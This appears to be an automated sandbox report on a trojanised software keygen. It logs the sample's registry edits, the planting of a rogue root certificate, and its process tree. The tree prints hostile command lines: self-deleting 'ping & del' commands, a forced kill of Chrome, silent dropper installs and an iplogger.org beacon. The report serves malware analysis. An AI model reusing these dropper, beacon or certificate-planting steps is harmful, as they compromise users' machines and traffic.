Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000000f1909e6974fe00319886b78c04a07bf87be2b933b2fc72014790a1480c76ff7365862211c3213c467009763efcf89b65a69bffe2f134cc0ce75 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = bf1efc97fd01d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 42c2319cfd01d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 3984 PING.EXE 640 PING.EXE 3656 PING.EXE 4468 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3996 1613216621223.exe 3996 1613216621223.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 1836 WerFault.exe 3884 1613216625786.exe 3884 1613216625786.exe 932 1613216631442.exe 932 1613216631442.exe 2504 23E04C4F32EF2158.tmp 2504 23E04C4F32EF2158.tmp 2280 seed.exe 2280 seed.exe 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found 2144 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4260 MicrosoftEdgeCP.exe 2280 seed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 200 msiexec.exe Token: SeIncreaseQuotaPrivilege 200 msiexec.exe Token: SeSecurityPrivilege 2424 msiexec.exe Token: SeCreateTokenPrivilege 200 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 200 msiexec.exe Token: SeLockMemoryPrivilege 200 msiexec.exe Token: SeIncreaseQuotaPrivilege 200 msiexec.exe Token: SeMachineAccountPrivilege 200 msiexec.exe Token: SeTcbPrivilege 200 msiexec.exe Token: SeSecurityPrivilege 200 msiexec.exe Token: SeTakeOwnershipPrivilege 200 msiexec.exe Token: SeLoadDriverPrivilege 200 msiexec.exe Token: SeSystemProfilePrivilege 200 msiexec.exe Token: SeSystemtimePrivilege 200 msiexec.exe Token: SeProfSingleProcessPrivilege 200 msiexec.exe Token: SeIncBasePriorityPrivilege 200 msiexec.exe Token: SeCreatePagefilePrivilege 200 msiexec.exe Token: SeCreatePermanentPrivilege 200 msiexec.exe Token: SeBackupPrivilege 200 msiexec.exe Token: SeRestorePrivilege 200 msiexec.exe Token: SeShutdownPrivilege 200 msiexec.exe Token: SeDebugPrivilege 200 msiexec.exe Token: SeAuditPrivilege 200 msiexec.exe Token: SeSystemEnvironmentPrivilege 200 msiexec.exe Token: SeChangeNotifyPrivilege 200 msiexec.exe Token: SeRemoteShutdownPrivilege 200 msiexec.exe Token: SeUndockPrivilege 200 msiexec.exe Token: SeSyncAgentPrivilege 200 msiexec.exe Token: SeEnableDelegationPrivilege 200 msiexec.exe Token: SeManageVolumePrivilege 200 msiexec.exe Token: SeImpersonatePrivilege 200 msiexec.exe Token: SeCreateGlobalPrivilege 200 msiexec.exe Token: SeCreateTokenPrivilege 200 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 200 msiexec.exe Token: SeLockMemoryPrivilege 200 msiexec.exe Token: SeIncreaseQuotaPrivilege 200 msiexec.exe Token: SeMachineAccountPrivilege 200 msiexec.exe Token: SeTcbPrivilege 200 msiexec.exe Token: SeSecurityPrivilege 200 msiexec.exe Token: SeTakeOwnershipPrivilege 200 msiexec.exe Token: SeLoadDriverPrivilege 200 msiexec.exe Token: SeSystemProfilePrivilege 200 msiexec.exe Token: SeSystemtimePrivilege 200 msiexec.exe Token: SeProfSingleProcessPrivilege 200 msiexec.exe Token: SeIncBasePriorityPrivilege 200 msiexec.exe Token: SeCreatePagefilePrivilege 200 msiexec.exe Token: SeCreatePermanentPrivilege 200 msiexec.exe Token: SeBackupPrivilege 200 msiexec.exe Token: SeRestorePrivilege 200 msiexec.exe Token: SeShutdownPrivilege 200 msiexec.exe Token: SeDebugPrivilege 200 msiexec.exe Token: SeAuditPrivilege 200 msiexec.exe Token: SeSystemEnvironmentPrivilege 200 msiexec.exe Token: SeChangeNotifyPrivilege 200 msiexec.exe Token: SeRemoteShutdownPrivilege 200 msiexec.exe Token: SeUndockPrivilege 200 msiexec.exe Token: SeSyncAgentPrivilege 200 msiexec.exe Token: SeEnableDelegationPrivilege 200 msiexec.exe Token: SeManageVolumePrivilege 200 msiexec.exe Token: SeImpersonatePrivilege 200 msiexec.exe Token: SeCreateGlobalPrivilege 200 msiexec.exe Token: SeCreateTokenPrivilege 200 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 200 msiexec.exe Token: SeLockMemoryPrivilege 200 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 200 msiexec.exe 2504 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 636 Setup.exe 3528 6489A2274AE24900.exe 3956 6489A2274AE24900.exe 3972 firefox.exe 3996 1613216621223.exe 2164 firefox.exe 3884 1613216625786.exe 2504 firefox.exe 932 1613216631442.exe 1216 ThunderFW.exe 1128 MiniThunderPlatform.exe 3392 23E04C4F32EF2158.exe 2504 23E04C4F32EF2158.tmp 2712 seed.sfx.exe 2164 MicrosoftEdge.exe 4260 MicrosoftEdgeCP.exe 4260 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2500 1628 Palo_Alto_Business_Plan_Pro_serial_key_gen.exe 78 PID 1628 wrote to memory of 2500 1628 Palo_Alto_Business_Plan_Pro_serial_key_gen.exe 78 PID 1628 wrote to memory of 2500 1628 Palo_Alto_Business_Plan_Pro_serial_key_gen.exe 78 PID 2500 wrote to memory of 1864 2500 cmd.exe 81 PID 2500 wrote to memory of 1864 2500 cmd.exe 81 PID 2500 wrote to memory of 1864 2500 cmd.exe 81 PID 2500 wrote to memory of 3688 2500 cmd.exe 82 PID 2500 wrote to memory of 3688 2500 cmd.exe 82 PID 2500 wrote to memory of 3688 2500 cmd.exe 82 PID 2500 wrote to memory of 3776 2500 cmd.exe 83 PID 2500 wrote to memory of 3776 2500 cmd.exe 83 PID 2500 wrote to memory of 3776 2500 cmd.exe 83 PID 2500 wrote to memory of 1340 2500 cmd.exe 84 PID 2500 wrote to memory of 1340 2500 cmd.exe 84 PID 2500 wrote to memory of 1340 2500 cmd.exe 84 PID 1864 wrote to memory of 3140 1864 keygen-pr.exe 85 PID 1864 wrote to memory of 3140 1864 keygen-pr.exe 85 PID 1864 wrote to memory of 3140 1864 keygen-pr.exe 85 PID 1340 wrote to memory of 636 1340 keygen-step-4.exe 86 PID 1340 wrote to memory of 636 1340 keygen-step-4.exe 86 PID 1340 wrote to memory of 636 1340 keygen-step-4.exe 86 PID 3776 wrote to memory of 3784 3776 keygen-step-3.exe 87 PID 3776 wrote to memory of 3784 3776 keygen-step-3.exe 87 PID 3776 wrote to memory of 3784 3776 keygen-step-3.exe 87 PID 3140 wrote to memory of 3876 3140 key.exe 89 PID 3140 wrote to memory of 3876 3140 key.exe 89 PID 3140 wrote to memory of 3876 3140 key.exe 89 PID 3784 wrote to memory of 3984 3784 cmd.exe 90 PID 3784 wrote to memory of 3984 3784 cmd.exe 90 PID 3784 wrote to memory of 3984 3784 cmd.exe 90 PID 636 wrote to memory of 200 636 Setup.exe 91 PID 636 wrote to memory of 200 636 Setup.exe 91 PID 636 wrote to memory of 200 636 Setup.exe 91 PID 2424 wrote to memory of 3828 2424 msiexec.exe 93 PID 2424 wrote to memory of 3828 2424 msiexec.exe 93 PID 2424 wrote to memory of 3828 2424 msiexec.exe 93 PID 636 wrote to memory of 3528 636 Setup.exe 94 PID 636 wrote to memory of 3528 636 Setup.exe 94 PID 636 wrote to memory of 3528 636 Setup.exe 94 PID 636 wrote to memory of 3956 636 Setup.exe 95 PID 636 wrote to memory of 3956 636 Setup.exe 95 PID 636 wrote to memory of 3956 636 Setup.exe 95 PID 636 wrote to memory of 3152 636 Setup.exe 96 PID 636 wrote to memory of 3152 636 Setup.exe 96 PID 636 wrote to memory of 3152 636 Setup.exe 96 PID 1340 wrote to memory of 3440 1340 keygen-step-4.exe 97 PID 1340 wrote to memory of 3440 1340 keygen-step-4.exe 97 PID 1340 wrote to memory of 3440 1340 keygen-step-4.exe 97 PID 3152 wrote to memory of 640 3152 cmd.exe 99 PID 3152 wrote to memory of 640 3152 cmd.exe 99 PID 3152 wrote to memory of 640 3152 cmd.exe 99 PID 3956 wrote to memory of 3644 3956 6489A2274AE24900.exe 100 PID 3956 wrote to memory of 3644 3956 6489A2274AE24900.exe 100 PID 3956 wrote to memory of 3644 3956 6489A2274AE24900.exe 100 PID 3528 wrote to memory of 3972 3528 6489A2274AE24900.exe 102 PID 3528 wrote to memory of 3972 3528 6489A2274AE24900.exe 102 PID 3528 wrote to memory of 3972 3528 6489A2274AE24900.exe 102 PID 3528 wrote to memory of 3972 3528 6489A2274AE24900.exe 102 PID 3528 wrote to memory of 3972 3528 6489A2274AE24900.exe 102 PID 3528 wrote to memory of 3972 3528 6489A2274AE24900.exe 102 PID 3644 wrote to memory of 2920 3644 cmd.exe 103 PID 3644 wrote to memory of 2920 3644 cmd.exe 103 PID 3644 wrote to memory of 2920 3644 cmd.exe 103 PID 3528 wrote to memory of 3996 3528 6489A2274AE24900.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\Palo_Alto_Business_Plan_Pro_serial_key_gen.exe"C:\Users\Admin\AppData\Local\Temp\Palo_Alto_Business_Plan_Pro_serial_key_gen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3688
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:200
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:3972
-
-
C:\Users\Admin\AppData\Roaming\1613216621223.exe"C:\Users\Admin\AppData\Roaming\1613216621223.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216621223.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:2164
-
-
C:\Users\Admin\AppData\Roaming\1613216625786.exe"C:\Users\Admin\AppData\Roaming\1613216625786.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216625786.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:2504
-
-
C:\Users\Admin\AppData\Roaming\1613216631442.exe"C:\Users\Admin\AppData\Roaming\1613216631442.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216631442.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\is-G1VE2.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-G1VE2.tmp\23E04C4F32EF2158.tmp" /SL5="$900EE,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2504 -
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2712 -
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
- Checks computer location settings
PID:3808
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵PID:4416
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵PID:1244
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:3656
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 27645⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4484
-
C:\Users\Admin\AppData\Roaming\B5DE.tmp.exe"C:\Users\Admin\AppData\Roaming\B5DE.tmp.exe"5⤵PID:5196
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DAEFE7D0BD0F4E42D77FF0DEBF433252 C2⤵
- Loads dropped DLL
PID:3828
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2164
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3048
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4260
-
